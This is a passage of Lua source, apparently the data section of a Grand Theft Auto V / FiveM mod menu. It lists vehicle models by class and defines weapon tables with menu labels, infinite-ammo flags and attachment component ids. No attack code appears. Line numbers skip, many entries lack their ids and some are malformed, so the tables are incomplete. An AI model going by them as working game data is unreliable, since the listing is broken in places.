  1203. 'Banshee',
  1204. 'Banshee2',
  1205. 'BestiaGTS',
  1206. 'Buffalo',
  1207. 'Buffalo2',
  1208. 'Buffalo3',
  1209. 'Carbonizzare',
  1210. 'Comet2',
  1211. 'Comet3',
  1212. 'Comet4',
  1213. 'Comet5',
  1214. 'Coquette',
  1215. 'Deveste',
  1216. 'Elegy',
  1217. 'Elegy2',
  1218. 'Feltzer2',
  1219. 'Feltzer3',
  1220. 'FlashGT',
  1221. 'Furoregt',
  1222. 'Fusilade',
  1223. 'Futo',
  1224. 'GB200',
  1225. 'Hotring',
  1226. 'Infernus2',
  1227. 'Italigto',
  1228. 'Jester',
  1229. 'Jester2',
  1230. 'Khamelion',
  1231. 'Kurama',
  1232. 'Kurama2',
  1233. 'Lynx',
  1234. 'MAssacro',
  1235. 'MAssacro2',
  1236. 'neon',
  1237. 'Ninef',
  1238. 'ninfe2',
  1239. 'omnis',
  1240. 'Pariah',
  1241. 'Penumbra',
  1242. 'Raiden',
  1243. 'RapidGT',
  1244. 'RapidGT2',
  1245. 'Raptor',
  1246. 'Revolter',
  1247. 'Ruston',
  1248. 'Schafter2',
  1249. 'Schafter3',
  1250. 'Schafter4',
  1251. 'Schafter5',
  1252. 'Schafter6',
  1253. 'Schlagen',
  1254. 'Schwarzer',
  1255. 'Sentinel3',
  1256. 'Seven70',
  1257. 'Specter',
  1258. 'Specter2',
  1259. 'Streiter',
  1260. 'Sultan',
  1261. 'Surano',
  1262. 'Tampa2',
  1263. 'Tropos',
  1264. 'Verlierer2',
  1265. 'ZR380',
  1266. 'ZR3802',
  1267. 'ZR3803'
  1268. }
  1269. local aY = {
  1270. 'Ardent',
  1271. 'BType',
  1272. 'BType2',
  1273. 'BType3',
  1274. 'Casco',
  1275. 'Cheetah2',
  1276. 'Cheburek',
  1277. 'Coquette2',
  1278. 'Coquette3',
  1279. 'Deluxo',
  1280. 'Fagaloa',
  1281. 'Gt500',
  1282. 'JB700',
  1283. 'JEster3',
  1284. 'MAmba',
  1285. 'Manana',
  1286. 'Michelli',
  1287. 'Monroe',
  1288. 'Peyote',
  1289. 'Pigalle',
  1290. 'RapidGT3',
  1291. 'Retinue',
  1292. 'Savastra',
  1293. 'Stinger',
  1294. 'Stingergt',
  1295. 'Stromberg',
  1296. 'Swinger',
  1297. 'Torero',
  1298. 'Tornado',
  1299. 'Tornado2',
  1300. 'Tornado3',
  1301. 'Tornado4',
  1302. 'Tornado5',
  1303. 'Tornado6',
  1304. 'Viseris',
  1305. 'Z190',
  1306. 'ZType'
  1307. }
  1308. local aZ = {
  1309. 'Adder',
  1310. 'Autarch',
  1311. 'Bullet',
  1312. 'Cheetah',
  1313. 'Cyclone',
  1314. 'EntityXF',
  1315. 'Entity2',
  1316. 'FMJ',
  1317. 'GP1',
  1318. 'Infernus',
  1319. 'LE7B',
  1320. 'Nero',
  1321. 'Nero2',
  1322. 'Osiris',
  1323. 'Penetrator',
  1324. 'PFister811',
  1325. 'Prototipo',
  1326. 'Reaper',
  1327. 'SC1',
  1328. 'Scramjet',
  1329. 'Sheava',
  1330. 'SultanRS',
  1331. 'Superd',
  1332. 'T20',
  1333. 'Taipan',
  1334. 'Tempesta',
  1335. 'Tezeract',
  1336. 'Turismo2',
  1337. 'Turismor',
  1338. 'Tyrant',
  1339. 'Tyrus',
  1340. 'Vacca',
  1341. 'Vagner',
  1342. 'Vigilante',
  1343. 'Visione',
  1344. 'Voltic',
  1345. 'Voltic2',
  1346. 'Zentorno',
  1347. 'Italigtb',
  1348. 'Italigtb2',
  1349. 'XA21'
  1350. }
  1351. local a_ = {
  1352. 'ArmyTanker',
  1353. 'ArmyTrailer',
  1354. 'ArmyTrailer2',
  1355. 'BaleTrailer',
  1356. 'BoatTrailer',
  1357. 'CableCar',
  1358. 'DockTrailer',
  1359. 'Graintrailer',
  1360. 'Proptrailer',
  1361. 'Raketailer',
  1362. 'TR2',
  1363. 'TR3',
  1364. 'TR4',
  1365. 'TRFlat',
  1366. 'TVTrailer',
  1367. 'Tanker',
  1368. 'Tanker2',
  1369. 'Trailerlogs',
  1370. 'Trailersmall',
  1371. 'Trailers',
  1372. 'Trailers2',
  1373. 'Trailers3'
  1374. }
  1375. local b0 = {
  1376. 'Freight',
  1377. 'Freightcar',
  1378. 'Freightcont1',
  1379. 'Freightcont2',
  1380. 'Freightgrain',
  1381. 'Freighttrailer',
  1382. 'TankerCar'
  1383. }
  1384. local b1 = {
  1385. 'Airtug',
  1386. 'Caddy',
  1387. 'Caddy2',
  1388. 'Caddy3',
  1389. 'Docktug',
  1390. 'Forklift',
  1391. 'Mower',
  1392. 'Ripley',
  1393. 'Sadler',
  1394. 'Scrap',
  1395. 'TowTruck',
  1396. 'Towtruck2',
  1397. 'Tractor',
  1398. 'Tractor2',
  1399. 'Tractor3',
  1400. 'TrailerLArge2',
  1401. 'Utilitruck',
  1402. 'Utilitruck3',
  1403. 'Utilitruck2'
  1404. }
  1405. local b2 = {
  1406. 'Bison',
  1407. 'Bison2',
  1408. 'Bison3',
  1409. 'BobcatXL',
  1410. 'Boxville',
  1411. 'Boxville2',
  1412. 'Boxville3',
  1413. 'Boxville4',
  1414. 'Boxville5',
  1415. 'Burrito',
  1416. 'Burrito2',
  1417. 'Burrito3',
  1418. 'Burrito4',
  1419. 'Burrito5',
  1420. 'Camper',
  1421. 'GBurrito',
  1422. 'GBurrito2',
  1423. 'Journey',
  1424. 'Minivan',
  1425. 'Minivan2',
  1426. 'Paradise',
  1427. 'pony',
  1428. 'Pony2',
  1429. 'Rumpo',
  1430. 'Rumpo2',
  1431. 'Rumpo3',
  1432. 'Speedo',
  1433. 'Speedo2',
  1434. 'Speedo4',
  1435. 'Surfer',
  1436. 'Surfer2',
  1437. 'Taco',
  1438. 'Youga',
  1439. 'youga2'
  1440. }
  1441. local b3 = {
  1442. 'Boats',
  1443. 'Commercial',
  1444. 'Compacts',
  1445. 'Coupes',
  1446. 'Cycles',
  1447. 'Emergency',
  1448. 'Helictopers',
  1449. 'Industrial',
  1450. 'Military',
  1451. 'Motorcycles',
  1452. 'Muscle',
  1453. 'Off-Road',
  1454. 'Planes',
  1455. 'SUVs',
  1456. 'Sedans',
  1457. 'Service',
  1458. 'Sports',
  1459. 'Sports Classic',
  1460. 'Super',
  1461. 'Trailer',
  1462. 'Trains',
  1463. 'Utility',
  1464. 'Vans'
  1465. }
  1466. local b4 = {
  1467. aH,
  1468. aI,
  1469. aJ,
  1470. aK,
  1471. aL,
  1472. aM,
  1473. aN,
  1474. aO,
  1475. aP,
  1476. aQ,
  1477. aR,
  1478. aS,
  1479. aT,
  1480. aU,
  1481. aV,
  1482. aW,
  1483. aX,
  1484. aY,
  1485. aZ,
  1486. a_,
  1487. b0,
  1488. b1,
  1489. b2
  1490. }
  1491. local b5 = {
  1492. 'ArmyTanker',
  1493. 'ArmyTrailer',
  1494. 'ArmyTrailer2',
  1495. 'BaleTrailer',
  1496. 'BoatTrailer',
  1497. 'CableCar',
  1498. 'DockTrailer',
  1499. 'Graintrailer',
  1500. 'Proptrailer',
  1501. 'Raketailer',
  1502. 'TR2',
  1503. 'TR3',
  1504. 'TR4',
  1505. 'TRFlat',
  1506. 'TVTrailer',
  1507. 'Tanker',
  1508. 'Tanker2',
  1509. 'Trailerlogs',
  1510. 'Trailersmall',
  1511. 'Trailers',
  1512. 'Trailers2',
  1513. 'Trailers3'
  1514. }
  1515. local b6 = {
  1516. 'WEAPON_KNIFE',
  1519. 'WEAPON_HAMMER',
  1520. 'WEAPON_BAT',
  1523. 'WEAPON_BOTTLE',
  1524. 'WEAPON_DAGGER',
  1529. 'WEAPON_PISTOL',
  1530. 'WEAPON_PISTOL_MK2',
  1533. 'WEAPON_PISTOL50',
  1542. 'WEAPON_SMG',
  1543. 'WEAPON_SMG_MK2',
  1545. 'WEAPON_MG',
  1563. 'WEAPON_MUSKET',
  1572. 'WEAPON_RPG',
  1579. 'WEAPON_BZGAS',
  1585. 'WEAPON_FLARE',
  1586. 'WEAPON_BALL'
  1587. }
  1588. local b7 = {
  1589. Melee = {
  1590. BaseballBat = {
  1591. id = 'weapon_bat',
  1592. name = '~h~~r~> ~s~Baseball Bat',
  1593. bInfAmmo = false,
  1594. mods = {}
  1595. },
  1596. BrokenBottle = {
  1597. id = 'weapon_bottle',
  1598. name = '~h~~r~> ~s~Broken Bottle',
  1599. bInfAmmo = false,
  1600. mods = {}
  1601. },
  1602. Crowbar = {
  1603. id = 'weapon_Crowbar',
  1604. name = '~h~~r~> ~s~Crowbar',
  1605. bInfAmmo = false,
  1606. mods = {}
  1607. },
  1608. Flashlight = {
  1609. id = 'weapon_flashlight',
  1610. name = '~h~~r~> ~s~Flashlight',
  1611. bInfAmmo = false,
  1612. mods = {}
  1613. },
  1614. GolfClub = {
  1615. id = 'weapon_golfclub',
  1616. name = '~h~~r~> ~s~Golf Club',
  1617. bInfAmmo = false,
  1618. mods = {}
  1619. },
  1620. BrassKnuckles = {
  1621. id = 'weapon_knuckle',
  1622. name = '~h~~r~> ~s~Brass Knuckles',
  1623. bInfAmmo = false,
  1624. mods = {}
  1625. },
  1626. Knife = {
  1627. id = 'weapon_knife',
  1628. name = '~h~~r~> ~s~Knife',
  1629. bInfAmmo = false,
  1630. mods = {}
  1631. },
  1632. Machete = {
  1633. id = 'weapon_machete',
  1634. name = '~h~~r~> ~s~Machete',
  1635. bInfAmmo = false,
  1636. mods = {}
  1637. },
  1638. Switchblade = {
  1639. id = 'weapon_switchblade',
  1640. name = '~h~~r~> ~s~Switchblade',
  1641. bInfAmmo = false,
  1642. mods = {}
  1643. },
  1644. Nightstick = {
  1645. id = 'weapon_nightstick',
  1646. name = '~h~~r~> ~s~Nightstick',
  1647. bInfAmmo = false,
  1648. mods = {}
  1649. },
  1650. BattleAxe = {
  1651. id = 'weapon_battleaxe',
  1652. name = '~h~~r~> ~s~Battle Axe',
  1653. bInfAmmo = false,
  1654. mods = {}
  1655. }
  1656. },
  1657. Handguns = {
  1658. Pistol = {
  1659. id = 'weapon_pistol',
  1660. name = '~h~~r~> ~s~Pistol',
  1661. bInfAmmo = false,
  1662. mods = {
  1663. Magazines = {
  1664. {
  1665. name = '~h~~r~> ~s~Default Magazine',
  1666. id = 'COMPONENT_PISTOL_CLIP_01'
  1667. },
  1668. {
  1669. name = '~h~~r~> ~s~Extended Magazine',
  1670. id = 'COMPONENT_PISTOL_CLIP_02'
  1671. }
  1672. },
  1673. Flashlight = {
  1674. {
  1675. name = '~h~~r~> ~s~Flashlight',
  1676. id = 'COMPONENT_AT_PI_FLSH'
  1677. }
  1678. },
  1679. BarrelAttachments = {
  1680. {
  1681. name = '~h~~r~> ~s~Suppressor',
  1682. id = 'COMPONENT_AT_PI_SUPP_02'
  1683. }
  1684. }
  1685. }
  1686. },
  1687. PistolMK2 = {
  1688. id = 'weapon_pistol_mk2',
  1689. name = '~h~~r~> ~s~Pistol MK 2',
  1690. bInfAmmo = false,
  1691. mods = {
  1692. Magazines = {
  1693. {
  1694. name = '~h~~r~> ~s~Default Magazine',
  1695. id = 'COMPONENT_PISTOL_MK2_CLIP_01'
  1696. },
  1697. {
  1698. name = '~h~~r~> ~s~Extended Magazine',
  1699. id = 'COMPONENT_PISTOL_MK2_CLIP_02'
  1700. },
  1701. {
  1702. name = '~h~~r~> ~s~Tracer Rounds',
  1704. },
  1705. {
  1706. name = '~h~~r~> ~s~Incendiary Rounds',
  1708. },
  1709. {
  1710. name = '~h~~r~> ~s~Hollow Point Rounds',
  1712. },
  1713. {
  1714. name = '~h~~r~> ~s~FMJ Rounds',
  1716. }
  1717. },
  1718. Sights = {
  1719. {
  1720. name = '~h~~r~> ~s~Mounted Scope',
  1721. id = 'COMPONENT_AT_PI_RAIL'
  1722. }
  1723. },
  1724. Flashlight = {
  1725. {
  1726. name = '~h~~r~> ~s~Flashlight',
  1727. id = 'COMPONENT_AT_PI_FLSH_02'
  1728. }
  1729. },
  1730. BarrelAttachments = {
  1731. {
  1732. name = '~h~~r~> ~s~Compensator',
  1733. id = 'COMPONENT_AT_PI_COMP'
  1734. },
  1735. {
  1736. name = '~h~~r~> ~s~Suppessor',
  1737. id = 'COMPONENT_AT_PI_SUPP_02'
  1738. }
  1739. }
  1740. }
  1741. },
  1742. CombatPistol = {
  1743. id = 'weapon_combatpistol',
  1744. name = '~h~Combat Pistol',
  1745. bInfAmmo = false,
  1746. mods = {
  1747. Magazines = {
  1748. {
  1749. name = '~h~~r~> ~s~Default Magazine',
  1751. },
  1752. {
  1753. name = '~h~~r~> ~s~Extended Magazine',
  1755. }
  1756. },
  1757. Flashlight = {
  1758. {
  1759. name = '~h~~r~> ~s~Flashlight',
  1760. id = 'COMPONENT_AT_PI_FLSH'
  1761. }
  1762. },
  1763. BarrelAttachments = {
  1764. {
  1765. name = '~h~~r~> ~s~Suppressor',
  1766. id = 'COMPONENT_AT_PI_SUPP'
  1767. }
  1768. }
  1769. }
  1770. },
  1771. APPistol = {
  1772. id = 'weapon_appistol',
  1773. name = 'AP Pistol',
  1774. bInfAmmo = false,
  1775. mods = {
  1776. Magazines = {
  1777. {
  1778. name = '~h~~r~> ~s~Default Magazine',
  1780. },
  1781. {
  1782. name = '~h~~r~> ~s~Extended Magazine',
  1784. }
  1785. },
  1786. Flashlight = {
  1787. {
  1788. name = '~h~~r~> ~s~Flashlight',
  1789. id = 'COMPONENT_AT_PI_FLSH'
  1790. }
  1791. },
  1792. BarrelAttachments = {
  1793. {
  1794. name = '~h~~r~> ~s~Suppressor',
  1795. id = 'COMPONENT_AT_PI_SUPP'
  1796. }
  1797. }
  1798. }
  1799. },
  1800. StunGun = {
  1801. id = 'weapon_stungun',
  1802. name = '~h~~r~> ~s~Stun Gun',
  1803. bInfAmmo = false,
  1804. mods = {}
  1805. },
  1806. Pistol50 = {
  1807. id = 'weapon_pistol50',
  1808. name = '~h~~r~> ~s~Pistol .50',
  1809. bInfAmmo = false,
  1810. mods = {
  1811. Magazines = {
  1812. {
  1813. name = '~h~~r~> ~s~Default Magazine',
  1814. id = 'COMPONENT_PISTOL50_CLIP_01'
  1815. },
  1816. {
  1817. name = '~h~~r~> ~s~Extended Magazine',
  1818. id = 'COMPONENT_PISTOL50_CLIP_02'
  1819. }
  1820. },
  1821. Flashlight = {
  1822. {
  1823. name = '~h~~r~> ~s~Flashlight',
  1824. id = 'COMPONENT_AT_PI_FLSH'
  1825. }
  1826. },
  1827. BarrelAttachments = {
  1828. {
  1829. name = '~h~~r~> ~s~Suppressor',
  1830. id = 'COMPONENT_AT_PI_SUPP_02'
  1831. }
  1832. }
  1833. }
  1834. },
  1835. SNSPistol = {
  1836. id = 'weapon_snspistol',
  1837. name = '~h~~r~> ~s~SNS Pistol',
  1838. bInfAmmo = false,
  1839. mods = {
  1840. Magazines = {
  1841. {
  1842. name = '~h~~r~> ~s~Default Magazine',
  1844. },
  1845. {
  1846. name = '~h~~r~> ~s~Extended Magazine',
  1848. }
  1849. }
  1850. }
  1851. },
  1852. SNSPistolMkII = {
  1853. id = 'weapon_snspistol_mk2',
  1854. name = '~h~~r~> ~s~SNS Pistol Mk II',
  1855. bInfAmmo = false,
  1856. mods = {
  1857. Magazines = {
  1858. {
  1859. name = '~h~~r~> ~s~Default Magazine',
  1861. },
  1862. {
  1863. name = '~h~~r~> ~s~Extended Magazine',
  1865. },
  1866. {
  1867. name = '~h~~r~> ~s~Tracer Rounds',
  1869. },
  1870. {
  1871. name = '~h~~r~> ~s~Incendiary Rounds',
  1873. },
  1874. {
  1875. name = '~h~~r~> ~s~Hollow Point Rounds',
  1877. },
  1878. {
  1879. name = '~h~~r~> ~s~FMJ Rounds',
  1881. }
  1882. },
  1883. Sights = {
  1884. {
  1885. name = '~h~~r~> ~s~Mounted Scope',
  1886. id = 'COMPONENT_AT_PI_RAIL_02'
  1887. }
  1888. },
  1889. Flashlight = {
  1890. {
  1891. name = '~h~~r~> ~s~Flashlight',
  1892. id = 'COMPONENT_AT_PI_FLSH_03'
  1893. }
  1894. },
  1895. BarrelAttachments = {
  1896. {
  1897. name = '~h~~r~> ~s~Compensator',
  1898. id = 'COMPONENT_AT_PI_COMP_02'
  1899. },
  1900. {
  1901. name = '~h~~r~> ~s~Suppressor',
  1902. id = 'COMPONENT_AT_PI_SUPP_02'
  1903. }
  1904. }
  1905. }
  1906. },
  1907. HeavyPistol = {
  1908. id = 'weapon_heavypistol',
  1909. name = '~h~~r~> ~s~Heavy Pistol',
  1910. bInfAmmo = false,
  1911. mods = {
  1912. Magazines = {
  1913. {
  1914. name = '~h~~r~> ~s~Default Magazine',
  1916. },
  1917. {
  1918. name = '~h~~r~> ~s~Extended Magazine',
  1920. }
  1921. },
  1922. Flashlight = {
  1923. {
  1924. name = '~h~~r~> ~s~Flashlight',
  1925. id = 'COMPONENT_AT_PI_FLSH'
  1926. }
  1927. },
  1928. BarrelAttachments = {
  1929. {
  1930. name = '~h~~r~> ~s~Suppressor',
  1931. id = 'COMPONENT_AT_PI_SUPP'
  1932. }
  1933. }
  1934. }
  1935. },
  1936. VintagePistol = {
  1937. id = 'weapon_vintagepistol',
  1938. name = '~h~~r~> ~s~Vintage Pistol',
  1939. bInfAmmo = false,
  1940. mods = {
  1941. Magazines = {
  1942. {
  1943. name = '~h~~r~> ~s~Default Magazine',
  1945. },
  1946. {
  1947. name = '~h~~r~> ~s~Extended Magazine',
  1949. }
  1950. },
  1951. BarrelAttachments = {
  1952. {
  1953. 'Suppressor',
  1954. id = 'COMPONENT_AT_PI_SUPP'
  1955. }
  1956. }
  1957. }
  1958. },
  1959. FlareGun = {
  1960. id = 'weapon_flaregun',
  1961. name = '~h~~r~> ~s~Flare Gun',
  1962. bInfAmmo = false,
  1963. mods = {}
  1964. },
  1965. MarksmanPistol = {
  1966. id = 'weapon_marksmanpistol',
  1967. name = '~h~~r~> ~s~Marksman Pistol',
  1968. bInfAmmo = false,
  1969. mods = {}
  1970. },
  1971. HeavyRevolver = {
  1972. id = 'weapon_revolver',
  1973. name = '~h~~r~> ~s~Heavy Revolver',
  1974. bInfAmmo = false,
  1975. mods = {}
  1976. },
  1977. HeavyRevolverMkII = {
  1978. id = 'weapon_revolver_mk2',
  1979. name = '~h~~r~> ~s~Heavy Revolver Mk II',
  1980. bInfAmmo = false,
  1981. mods = {
  1982. Magazines = {
  1983. {
  1984. name = '~h~~r~> ~s~Default Rounds',
  1986. },
  1987. {
  1988. name = '~h~~r~> ~s~Tracer Rounds',
  1990. },
  1991. {
  1992. name = '~h~~r~> ~s~Incendiary Rounds',
  1994. },
  1995. {
  1996. name = '~h~~r~> ~s~Hollow Point Rounds',
  1998. },
  1999. {
  2000. name = '~h~~r~> ~s~FMJ Rounds',
  2002. }
  2003. },
  2004. Sights = {
  2005. {
  2006. name = '~h~~r~> ~s~Holograhpic Sight',
  2007. id = 'COMPONENT_AT_SIGHTS'
  2008. },
  2009. {
  2010. name = '~h~~r~> ~s~Small Scope',
  2012. }
  2013. },
  2014. Flashlight = {
  2015. {
  2016. name = '~h~~r~> ~s~Flashlight',
  2017. id = 'COMPONENT_AT_PI_FLSH'
  2018. }
  2019. },
  2020. BarrelAttachments = {
  2021. {
  2022. name = '~h~~r~> ~s~Compensator',
  2023. id = 'COMPONENT_AT_PI_COMP_03'
  2024. }
  2025. }
  2026. }
  2027. },
  2028. DoubleActionRevolver = {
  2029. id = 'weapon_doubleaction',
  2030. name = '~h~~r~> ~s~Double Action Revolver',
  2031. bInfAmmo = false,
  2032. mods = {}
  2033. },
  2034. UpnAtomizer = {
  2035. id = 'weapon_raypistol',
  2036. name = '~h~~r~> ~s~Up-n-Atomizer',
  2037. bInfAmmo = false,
  2038. mods = {}
  2039. }
  2040. },
  2041. SMG = {
  2042. MicroSMG = {
  2043. id = 'weapon_microsmg',
  2044. name = '~h~~r~> ~s~Micro SMG',
  2045. bInfAmmo = false,
  2046. mods = {
  2047. Magazines = {
  2048. {
  2049. name = '~h~~r~> ~s~Default Magazine',
  2051. },
  2052. {
  2053. name = '~h~~r~> ~s~Extended Magazine',
  2055. }
  2056. },
  2057. Sights = {
  2058. {
  2059. name = '~h~~r~> ~s~Scope',
  2061. }
  2062. },
  2063. Flashlight = {
  2064. {
  2065. name = '~h~~r~> ~s~Flashlight',
  2066. id = 'COMPONENT_AT_PI_FLSH'
  2067. }
  2068. },
  2069. BarrelAttachments = {
  2070. {
  2071. name = '~h~~r~> ~s~Suppressor',
  2072. id = 'COMPONENT_AT_AR_SUPP_02'
  2073. }
  2074. }
  2075. }
  2076. },
  2077. SMG = {
  2078. id = 'weapon_smg',
  2079. name = '~h~~r~> ~s~SMG',
  2080. bInfAmmo = false,
  2081. mods = {
  2082. Magazines = {
  2083. {
  2084. name = '~h~~r~> ~s~Default Magazine',
  2085. id = 'COMPONENT_SMG_CLIP_01'
  2086. },
  2087. {
  2088. name = '~h~~r~> ~s~Extended Magazine',
  2089. id = 'COMPONENT_SMG_CLIP_02'
  2090. },
  2091. {
  2092. name = '~h~~r~> ~s~Drum Magazine',
  2093. id = 'COMPONENT_SMG_CLIP_03'
  2094. }
  2095. },
  2096. Sights = {
  2097. {
  2098. name = '~h~~r~> ~s~Scope',
  2099. id = 'COMPONENT_AT_SCOPE_MACRO_02'
  2100. }
  2101. },
  2102. Flashlight = {
  2103. {
  2104. name = '~h~~r~> ~s~Flashlight',
  2105. id = 'COMPONENT_AT_AR_FLSH'
  2106. }
  2107. },
  2108. BarrelAttachments = {
  2109. {
  2110. name = '~h~~r~> ~s~Suppressor',
  2111. id = 'COMPONENT_AT_PI_SUPP'
  2112. }
  2113. }
  2114. }
  2115. },
  2116. SMGMkII = {
  2117. id = 'weapon_smg_mk2',
  2118. name = '~h~~r~> ~s~SMG Mk II',
  2119. bInfAmmo = false,
  2120. mods = {
  2121. Magazines = {
  2122. {
  2123. name = '~h~~r~> ~s~Default Magazine',
  2124. id = 'COMPONENT_SMG_MK2_CLIP_01'
  2125. },
  2126. {
  2127. name = '~h~~r~> ~s~Extended Magazine',
  2128. id = 'COMPONENT_SMG_MK2_CLIP_02'
  2129. },
  2130. {
  2131. name = '~h~~r~> ~s~Tracer Rounds',
  2133. },
  2134. {
  2135. name = '~h~~r~> ~s~Incendiary Rounds',
  2137. },
  2138. {
  2139. name = '~h~~r~> ~s~Hollow Point Rounds',
  2141. },
  2142. {
  2143. name = '~h~~r~> ~s~FMJ Rounds',
  2145. }
  2146. },
  2147. Sights = {
  2148. {
  2149. name = '~h~~r~> ~s~Holograhpic Sight',
  2151. },
  2152. {
  2153. name = '~h~~r~> ~s~Small Scope',
  2155. },
  2156. {
  2157. name = '~h~~r~> ~s~Medium Scope',
  2159. }
  2160. },
  2161. Flashlight = {
  2162. {
  2163. name = '~h~~r~> ~s~Flashlight',
  2164. id = 'COMPONENT_AT_AR_FLSH'
  2165. }
  2166. },
  2167. Barrel = {
  2168. {
  2169. name = '~h~~r~> ~s~Default',
  2170. id = 'COMPONENT_AT_SB_BARREL_01'
  2171. },
  2172. {
  2173. name = '~h~~r~> ~s~Heavy',
  2174. id = 'COMPONENT_AT_SB_BARREL_02'
  2175. }
  2176. },
  2177. BarrelAttachments = {
  2178. {
  2179. name = '~h~~r~> ~s~Suppressor',
  2180. id = 'COMPONENT_AT_PI_SUPP'
  2181. },
  2182. {
  2183. name = '~h~~r~> ~s~Flat Muzzle Brake',
  2184. id = 'COMPONENT_AT_MUZZLE_01'
  2185. },
  2186. {
  2187. name = '~h~~r~> ~s~Tactical Muzzle Brake',
  2188. id = 'COMPONENT_AT_MUZZLE_02'
  2189. },
  2190. {
  2191. name = '~h~~r~> ~s~Fat-End Muzzle Brake',
  2192. id = 'COMPONENT_AT_MUZZLE_03'
  2193. },
  2194. {
  2195. name = '~h~~r~> ~s~Precision Muzzle Brake',
  2196. id = 'COMPONENT_AT_MUZZLE_04'
  2197. },
  2198. {
  2199. name = '~h~~r~> ~s~Heavy Duty Muzzle Brake',
  2200. id = 'COMPONENT_AT_MUZZLE_05'
  2201. },
  2202. {
  2203. name = '~h~~r~> ~s~Slanted Muzzle Brake',
  2204. id = 'COMPONENT_AT_MUZZLE_06'
  2205. },
  2206. {
  2207. name = '~h~~r~> ~s~Split-End Muzzle Brake',
  2208. id = 'COMPONENT_AT_MUZZLE_07'
  2209. }
  2210. }
  2211. }
  2212. },
  2213. AssaultSMG = {
  2214. id = 'weapon_assaultsmg',
  2215. name = '~h~~r~> ~s~Assault SMG',
  2216. bInfAmmo = false,
  2217. mods = {
  2218. Magazines = {
  2219. {
  2220. name = '~h~~r~> ~s~Default Magazine',
  2222. },
  2223. {
  2224. name = '~h~~r~> ~s~Extended Magazine',
  2226. }
  2227. },
  2228. Sights = {
  2229. {
  2230. name = '~h~~r~> ~s~Scope',
  2232. }
  2233. },
  2234. Flashlight = {
  2235. {
  2236. name = '~h~~r~> ~s~Flashlight',
  2237. id = 'COMPONENT_AT_AR_FLSH'
  2238. }
  2239. },
  2240. BarrelAttachments = {
  2241. {
  2242. name = '~h~~r~> ~s~Suppressor',
  2243. id = 'COMPONENT_AT_AR_SUPP_02'
  2244. }
  2245. }
  2246. }
  2247. },
  2248. CombatPDW = {
  2249. id = 'weapon_combatpdw',
  2250. name = '~h~~r~> ~s~Combat PDW',
  2251. bInfAmmo = false,
  2252. mods = {
  2253. Magazines = {
  2254. {
  2255. name = '~h~~r~> ~s~Default Magazine',
  2257. },
  2258. {
  2259. name = '~h~~r~> ~s~Extended Magazine',
  2261. },
  2262. {
  2263. name = '~h~~r~> ~s~Drum Magazine',
  2265. }
  2266. },
  2267. Sights = {
  2268. {
  2269. name = '~h~~r~> ~s~Scope',
  2271. }
  2272. },
  2273. Flashlight = {
  2274. {
  2275. name = '~h~~r~> ~s~Flashlight',
  2276. id = 'COMPONENT_AT_AR_FLSH'
  2277. }
  2278. },
  2279. Grips = {
  2280. {
  2281. name = '~h~~r~> ~s~Grip',
  2283. }
  2284. }
  2285. }
  2286. },
  2287. MachinePistol = {
  2288. id = 'weapon_machinepistol',
  2289. name = '~h~~r~> ~s~Machine Pistol ',
  2290. bInfAmmo = false,
  2291. mods = {
  2292. Magazines = {
  2293. {
  2294. name = '~h~~r~> ~s~Default Magazine',
  2296. },
  2297. {
  2298. name = '~h~~r~> ~s~Extended Magazine',
  2300. },
  2301. {
  2302. name = '~h~~r~> ~s~Drum Magazine',
  2304. }
  2305. },
  2306. BarrelAttachments = {
  2307. {
  2308. name = '~h~~r~> ~s~Suppressor',
  2309. id = 'COMPONENT_AT_PI_SUPP'
  2310. }
  2311. }
  2312. }
  2313. },
  2314. MiniSMG = {
  2315. id = 'weapon_minismg',
  2316. name = '~h~~r~> ~s~Mini SMG',
  2317. bInfAmmo = false,
  2318. mods = {
  2319. Magazines = {
  2320. {
  2321. name = '~h~~r~> ~s~Default Magazine',
  2322. id = 'COMPONENT_MINISMG_CLIP_01'
  2323. },
  2324. {
  2325. name = '~h~~r~> ~s~Extended Magazine',
  2326. id = 'COMPONENT_MINISMG_CLIP_02'
  2327. }
  2328. }
  2329. }
  2330. },
  2331. UnholyHellbringer = {
  2332. id = 'weapon_raycarbine',
  2333. name = '~h~~r~> ~s~Unholy Hellbringer',
  2334. bInfAmmo = false,
  2335. mods = {}
  2336. }
  2337. },
  2338. Shotguns = {
  2339. PumpShotgun = {
  2340. id = 'weapon_pumpshotgun',
  2341. name = '~h~~r~> ~s~Pump Shotgun',
  2342. bInfAmmo = false,
  2343. mods = {
  2344. Flashlight = {
  2345. {
  2346. 'name = Flashlight',
  2347. id = 'COMPONENT_AT_AR_FLSH'
  2348. }
  2349. },
  2350. BarrelAttachments = {
  2351. {
  2352. name = '~h~~r~> ~s~Suppressor',
  2353. id = 'COMPONENT_AT_SR_SUPP'
  2354. }
  2355. }
  2356. }
  2357. },
  2358. PumpShotgunMkII = {
  2359. id = 'weapon_pumpshotgun_mk2',
  2360. name = '~h~~r~> ~s~Pump Shotgun Mk II',
  2361. bInfAmmo = false,
  2362. mods = {
  2363. Magazines = {
  2364. {
  2365. name = '~h~~r~> ~s~Default Shells',
  2367. },
  2368. {
  2369. name = '~h~~r~> ~s~Dragon Breath Shells',
  2371. },
  2372. {
  2373. name = '~h~~r~> ~s~Steel Buckshot Shells',
  2375. },
  2376. {
  2377. name = '~h~~r~> ~s~Flechette Shells',
  2379. },
  2380. {
  2381. name = '~h~~r~> ~s~Explosive Slugs',
  2383. }
  2384. },
  2385. Sights = {
  2386. {
  2387. name = '~h~~r~> ~s~Holograhpic Sight',
  2388. id = 'COMPONENT_AT_SIGHTS'
  2389. },
  2390. {
  2391. name = '~h~~r~> ~s~Small Scope',
  2393. },
  2394. {
  2395. name = '~h~~r~> ~s~Medium Scope',
  2397. }
  2398. },
  2399. Flashlight = {
  2400. {
  2401. name = '~h~~r~> ~s~Flashlight',
  2402. id = 'COMPONENT_AT_AR_FLSH'
  2403. }
  2404. },
  2405. BarrelAttachments = {
  2406. {
  2407. name = '~h~~r~> ~s~Suppressor',
  2408. id = 'COMPONENT_AT_SR_SUPP_03'
  2409. },
  2410. {
  2411. name = '~h~~r~> ~s~Squared Muzzle Brake',
  2412. id = 'COMPONENT_AT_MUZZLE_08'
  2413. }
  2414. }
  2415. }
  2416. },
  2417. SawedOffShotgun = {
  2418. id = 'weapon_sawnoffshotgun',
  2419. name = '~h~~r~> ~s~Sawed-Off Shotgun',
  2420. bInfAmmo = false,
  2421. mods = {}
  2422. },
  2423. AssaultShotgun = {
  2424. id = 'weapon_assaultshotgun',
  2425. name = '~h~~r~> ~s~Assault Shotgun',
  2426. bInfAmmo = false,
  2427. mods = {
  2428. Magazines = {
  2429. {
  2430. name = '~h~~r~> ~s~Default Magazine',
  2432. },
